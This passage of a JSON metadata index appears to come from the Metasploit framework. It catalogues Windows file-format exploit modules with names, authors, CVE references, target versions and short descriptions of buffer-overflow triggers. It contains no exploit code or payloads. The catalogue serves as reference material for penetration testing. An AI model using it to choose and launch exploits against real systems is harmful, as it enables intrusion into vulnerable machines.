"path": "/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/blazedvd_hdtv_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/blazedvd_plf": {
"name": "BlazeDVD 6.1 PLF Buffer Overflow",
"full_name": "exploit/windows/fileformat/blazedvd_plf",
"rank": 400,
"disclosure_date": "2009-08-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Deepak Rathore",
"Spencer McIntyre",
"Ken Smith"
],
"description": "This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When\n the application is used to open a specially crafted plf file,\n a buffer is overwritten allowing for the execution of arbitrary code.",
"references": [
"CVE-2006-6199",
"EDB-32737",
"OSVDB-30770",
"BID-35918"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BlazeDVD 6.2",
"BlazeDVD 5.1"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/fileformat/blazedvd_plf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/blazedvd_plf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-down"
],
"SideEffects": [
"screen-effects"
]
}
},
"exploit_windows/fileformat/boxoft_wav_to_mp3": {
"name": "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow",
"full_name": "exploit/windows/fileformat/boxoft_wav_to_mp3",
"rank": 300,
"disclosure_date": "2015-08-31",
"type": "exploit",
"author": [
"Robbie Corley",
"Shelby Pace"
],
"description": "This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.\n By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the\n application, a buffer is overwritten, which allows for running shellcode.",
"references": [
"CVE-2015-7243",
"EDB-38035"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Boxoft WAV to MP3 Converter v1.1"
],
"mod_time": "2018-07-02 14:00:33 +0000",
"path": "/modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/boxoft_wav_to_mp3",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/bpftp_client_bps_bof": {
"name": "BulletProof FTP Client BPS Buffer Overflow",
"full_name": "exploit/windows/fileformat/bpftp_client_bps_bof",
"rank": 300,
"disclosure_date": "2014-07-24",
"type": "exploit",
"author": [
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n BulletProof FTP Client 2010, caused by an overly long hostname.\n\n By persuading the victim to open a specially-crafted .BPS file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3.",
"references": [
"EDB-34162",
"EDB-34540",
"EDB-35449",
"OSVDB-109547",
"CVE-2014-2973"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/bpftp_client_bps_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/bsplayer_m3u": {
"name": "BS.Player 2.57 Buffer Overflow (Unicode SEH)",
"full_name": "exploit/windows/fileformat/bsplayer_m3u",
"rank": 300,
"disclosure_date": "2010-01-07",
"type": "exploit",
"author": [
"C4SS!0 G0M3S",
"Chris Gabriel"
],
"description": "This module exploits a buffer overflow in BS.Player 2.57. When\n the playlist import is used to import a specially crafted m3u file,\n a buffer overflow occurs allowing arbitrary code execution.",
"references": [
"OSVDB-82528",
"EDB-15934"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP",
"Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/bsplayer_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/bsplayer_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ca_cab": {
"name": "CA Antivirus Engine CAB Buffer Overflow",
"full_name": "exploit/windows/fileformat/ca_cab",
"rank": 400,
"disclosure_date": "2007-06-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.\n By creating a specially crafted CAB file, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2007-2864",
"OSVDB-35245",
"BID-24330",
"ZDI-07-035"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ca_cab.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ca_cab",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/cain_abel_4918_rdp": {
"name": "Cain and Abel RDP Buffer Overflow",
"full_name": "exploit/windows/fileformat/cain_abel_4918_rdp",
"rank": 400,
"disclosure_date": "2008-11-30",
"type": "exploit",
"author": [
"Trancek <trancek@yashira.org>"
],
"description": "This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24\n and below. An attacker must send the file to victim, and the victim must open\n the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.",
"references": [
"CVE-2008-5405",
"OSVDB-50342",
"EDB-7329",
"BID-32543"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 English",
"Windows XP SP0/1 English",
"Windows XP SP2 Spanish"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cain_abel_4918_rdp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ccmplayer_m3u_bof": {
"name": "CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow",
"full_name": "exploit/windows/fileformat/ccmplayer_m3u_bof",
"rank": 400,
"disclosure_date": "2011-11-30",
"type": "exploit",
"author": [
"Rh0"
],
"description": "This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening\n a m3u playlist with a long track name, a SEH exception record can be overwritten\n with parts of the controllable buffer. SEH execution is triggered after an\n invalid read of an injectable address, thus allowing arbitrary code execution.\n This module works on multiple Windows platforms including: Windows XP SP3,\n Windows Vista, and Windows 7.",
"references": [
"CVE-2011-5170",
"OSVDB-77453",
"EDB-18178"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CCMPlayer 1.5"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ccmplayer_m3u_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/chasys_draw_ies_bmp_bof": {
"name": "Chasys Draw IES Buffer Overflow",
"full_name": "exploit/windows/fileformat/chasys_draw_ies_bmp_bof",
"rank": 300,
"disclosure_date": "2013-07-26",
"type": "exploit",
"author": [
"Christopher Gabriel",
"Longinos Recuero Bustos",
"Javier 'soez'",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability found in Chasys Draw IES\n (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while\n parsing BMP files, where the ReadFile function is used to store user provided data\n on the stack in an insecure way. It results in arbitrary code execution under the\n context of the user viewing a specially crafted BMP file. This module has been\n tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7\n SP1.",
"references": [
"CVE-2013-3928",
"OSVDB-95689",
"BID-61463",
"URL-http://secunia.com/advisories/53773/",
"URL-http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/chasys_draw_ies_bmp_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/coolpdf_image_stream_bof": {
"name": "Cool PDF Image Stream Buffer Overflow",
"full_name": "exploit/windows/fileformat/coolpdf_image_stream_bof",
"rank": 300,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Francis Provencher",
"Chris Gabriel",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Cool PDF Reader prior to version\n 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that\n contains a specially crafted image stream. This module has been tested successfully\n on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2012-4914",
"OSVDB-89349",
"EDB-24463",
"URL-http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Cool PDF 3.0.2.256 / Windows 7 SP1 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/coolpdf_image_stream_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/corelpdf_fusion_bof": {
"name": "Corel PDF Fusion Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/corelpdf_fusion_bof",
"rank": 300,
"disclosure_date": "2013-07-08",
"type": "exploit",
"author": [
"Kaveh Ghaemmaghami",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in version 1.11 of\n Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry\n names. In order for the payload to be executed, an attacker must convince the target\n user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the\n attacker can execute arbitrary code as the target user.",
"references": [
"CVE-2013-3248",
"OSVDB-94933",
"BID-61010",
"URL-http://secunia.com/advisories/52707/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Corel PDF Fusion 1.11 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/corelpdf_fusion_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/csound_getnum_bof": {
"name": "Csound hetro File Handling Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/csound_getnum_bof",
"rank": 300,
"disclosure_date": "2012-02-23",
"type": "exploit",
"author": [
"Secunia",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Csound before 5.16.6.\n The overflow occurs when trying to import a malicious hetro file\n from tabular format.\n In order to achieve exploitation the user should import the malicious\n file through csound with a command like \"csound -U het_import msf.csd file.het\".\n This exploit doesn't work if the \"het_import\" command is used directly\n to convert the file.",
"references": [
"CVE-2012-0270",
"OSVDB-79491",
"BID-52144",
"URL-http://secunia.com/secunia_research/2012-3/",
"URL-http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Csound 5.15 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/csound_getnum_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/csound_getnum_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/cutezip_bof": {
"name": "GlobalSCAPE CuteZIP Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/cutezip_bof",
"rank": 300,
"disclosure_date": "2011-02-12",
"type": "exploit",
"author": [
"C4SS!0 G0M3S <Louredo_@hotmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of CuteZIP.\n\n In order for the command to be executed, an attacker must convince the target user\n to open a specially crafted zip file with CuteZIP. By doing so, an attacker can\n execute arbitrary code as the target user.",
"references": [
"OSVDB-85709",
"EDB-16162",
"BID-46375"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CuteZIP 2.1 / Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/cutezip_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cutezip_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/cve_2017_8464_lnk_rce": {
"name": "LNK Code Execution Vulnerability",
"full_name": "exploit/windows/fileformat/cve_2017_8464_lnk_rce",
"rank": 600,
"disclosure_date": "2017-06-13",
"type": "exploit",
"author": [
"Uncredited",
"Yorick Koster",
"Spencer McIntyre"
],
"description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n If no PATH is specified, the module will use drive letters D through Z so the files\n may be placed in the root path of a drive such as a shared VM folder or USB drive.",
"references": [
"CVE-2017-8464",
"URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464",
"URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt",
"URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx",
"URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm",
"URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows x64",
"Windows x86"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cve_2017_8464_lnk_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-restarts"
]
}
},
"exploit_windows/fileformat/cyberlink_lpp_bof": {
"name": "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/cyberlink_lpp_bof",
"rank": 300,
"disclosure_date": "2017-09-23",
"type": "exploit",
"author": [
"modpr0be <tom@spentera.id>",
"f3ci <marie@spentera.id>"
],
"description": "This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.\n The vulnerability is triggered when opening a .lpp project file containing overly long string characters\n via open file menu. This results in overwriting a structured exception handler record and take over the\n application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).",
"references": [
"CVE-2017-14627",
"EDB-42777"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CyberLink LabelPrint <= 2.5 on Windows 7 (64 bit)",
"CyberLink LabelPrint <= 2.5 on Windows 8.1 x64",
"CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803"
],
"mod_time": "2018-12-11 07:55:20 +0000",
"path": "/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cyberlink_lpp_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/cyberlink_p2g_bof": {
"name": "CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit",
"full_name": "exploit/windows/fileformat/cyberlink_p2g_bof",
"rank": 500,
"disclosure_date": "2011-09-12",
"type": "exploit",
"author": [
"modpr0be <modpr0be@spentera.com>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x\n The vulnerability is triggered when opening a malformed p2g file containing an overly\n long string in the 'name' attribute of the file element. This results in overwriting a\n structured exception handler record.",
"references": [
"CVE-2011-5171",
"BID-50997",
"OSVDB-77600",
"EDB-18220",
"US-CERT-VU-158003"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CyberLink Power2Go 8 (XP/Vista/win7) Universal"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cyberlink_p2g_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/cytel_studio_cy3": {
"name": "Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/cytel_studio_cy3",
"rank": 400,
"disclosure_date": "2011-10-02",
"type": "exploit",
"author": [
"Luigi Auriemma",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow found\n in Cytel Studio <= 9.0. The overflow is triggered during the\n copying of strings to a stack buffer of 256 bytes.",
"references": [
"OSVDB-75991",
"BID-49924",
"URL-http://aluigi.altervista.org/adv/cytel_1-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Cytel Studio 9.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/cytel_studio_cy3",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/deepburner_path": {
"name": "AstonSoft DeepBurner (DBR File) Path Buffer Overflow",
"full_name": "exploit/windows/fileformat/deepburner_path",
"rank": 500,
"disclosure_date": "2006-12-19",
"type": "exploit",
"author": [
"Expanders",
"fl0 fl0w",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in versions 1.9.0.228,\n 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n DBR file within a browser, since the DBR extension is registered to DeepBurner.",
"references": [
"BID-21657",
"OSVDB-32356",
"CVE-2006-6665",
"EDB-2950",
"EDB-8335",
"EDB-11315"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/deepburner_path.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/deepburner_path",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/destinymediaplayer16": {
"name": "Destiny Media Player 1.61 PLS M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/destinymediaplayer16",
"rank": 400,
"disclosure_date": "2009-01-03",
"type": "exploit",
"author": [
"Trancek <trancek@yashira.org>"
],
"description": "This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.\n An attacker must send the file to victim and the victim must open the file. File-->Open Playlist",
"references": [
"CVE-2009-3429",
"OSVDB-53249",
"EDB-7651",
"BID-33091"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Destiny Universal",
"Windows XP SP2 Spanish"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/fileformat/destinymediaplayer16.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/destinymediaplayer16",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/digital_music_pad_pls": {
"name": "Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/digital_music_pad_pls",
"rank": 300,
"disclosure_date": "2010-09-17",
"type": "exploit",
"author": [
"Abhishek Lyall <abhilyall@gmail.com>"
],
"description": "This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4\n When opening a malicious pls file with the Digital Music Pad,\n a remote attacker could overflow a buffer and execute\n arbitrary code.",
"references": [
"OSVDB-68178",
"URL-http://secunia.com/advisories/41519/",
"EDB-15134"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/digital_music_pad_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/digital_music_pad_pls",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/djstudio_pls_bof": {
"name": "DJ Studio Pro 5.1 .pls Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/djstudio_pls_bof",
"rank": 300,
"disclosure_date": "2009-12-30",
"type": "exploit",
"author": [
"Sebastien Duquette",
"Death-Shadow-Dark <death.shadow.dark@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2.\n When handling a .pls file, DJ Studio will copy the user-supplied data on the stack\n without any proper bounds checking done beforehand, therefore allowing code\n execution under the context of the user.",
"references": [
"CVE-2009-4656",
"OSVDB-58159",
"EDB-10827"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"DJ Studio Pro 5.1.6.5.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/djstudio_pls_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/djstudio_pls_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/djvu_imageurl": {
"name": "DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow",
"full_name": "exploit/windows/fileformat/djvu_imageurl",
"rank": 100,
"disclosure_date": "2008-10-30",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "This module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an\n overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0)\n an attacker may be able to execute arbitrary code. This control is not marked safe\n for scripting, so choose your attack vector accordingly.",
"references": [
"CVE-2008-4922",
"OSVDB-49592",
"BID-31987"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/djvu_imageurl.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/djvu_imageurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/dupscout_xml": {
"name": "Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow",
"full_name": "exploit/windows/fileformat/dupscout_xml",
"rank": 300,
"disclosure_date": "2017-03-29",
"type": "exploit",
"author": [
"Daniel Teixeira"
],
"description": "This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16\n by using the import command option to import a specially crafted xml file.",
"references": [
"CVE-2017-7310"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-02-01 10:05:50 +0000",
"path": "/modules/exploits/windows/fileformat/dupscout_xml.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/dupscout_xml",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/dvdx_plf_bof": {
"name": "DVD X Player 5.5 .plf PlayList Buffer Overflow",
"full_name": "exploit/windows/fileformat/dvdx_plf_bof",
"rank": 300,
"disclosure_date": "2007-06-02",
"type": "exploit",
"author": [
"n00b",
"D3r K0n!G",
"sickness",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and\n Standard. By supplying a long string of data in a plf file (playlist), the\n MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,\n and then copy it on the stack without any proper bounds checking, which causes a\n buffer overflow, and results in arbitrary code execution under the context of the user.\n\n This module has been designed to target common Windows systems such as:\n Windows XP SP2/SP3, Windows Vista, and Windows 7.",
"references": [
"CVE-2007-3068",
"OSVDB-36956",
"BID-24278",
"EDB-17745"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"DVD X Player 5.5 Standard / Pro"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/fileformat/dvdx_plf_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/dvdx_plf_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/easycdda_pls_bof": {
"name": "Easy CD-DA Recorder PLS Buffer Overflow",
"full_name": "exploit/windows/fileformat/easycdda_pls_bof",
"rank": 300,
"disclosure_date": "2010-06-07",
"type": "exploit",
"author": [
"chap0",
"Gabor Seljan",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry.\n By persuading the victim to open a specially-crafted PLS file, a\n remote attacker can execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3 and Windows 7 SP1.",
"references": [
"BID-40631",
"EDB-13761",
"OSVDB-65256",
"CVE-2010-2343",
"URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Windows 7 SP1 (DEP Bypass)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/easycdda_pls_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/easycdda_pls_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/emc_appextender_keyworks": {
"name": "EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/fileformat/emc_appextender_keyworks",
"rank": 200,
"disclosure_date": "2009-09-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control\n (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's\n Documentation ApplicationXtender 5.4.",
"references": [
"CVE-2012-2515",
"OSVDB-58423",
"BID-36546"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/emc_appextender_keyworks",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/erdas_er_viewer_bof": {
"name": "ERS Viewer 2011 ERS File Handling Buffer Overflow",
"full_name": "exploit/windows/fileformat/erdas_er_viewer_bof",
"rank": 300,
"disclosure_date": "2013-04-23",
"type": "exploit",
"author": [
"Parvez Anwar",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2011\n (version 11.04). The vulnerability exists in the module ermapper_u.dll where the\n function ERM_convert_to_correct_webpath handles user provided data in an insecure\n way. It results in arbitrary code execution under the context of the user viewing\n a specially crafted .ers file. This module has been tested successfully with ERS\n Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2013-0726",
"OSVDB-92694",
"BID-59379",
"URL-http://secunia.com/advisories/51725/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/erdas_er_viewer_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/erdas_er_viewer_rf_report_error": {
"name": "ERS Viewer 2013 ERS File Handling Buffer Overflow",
"full_name": "exploit/windows/fileformat/erdas_er_viewer_rf_report_error",
"rank": 300,
"disclosure_date": "2013-05-23",
"type": "exploit",
"author": [
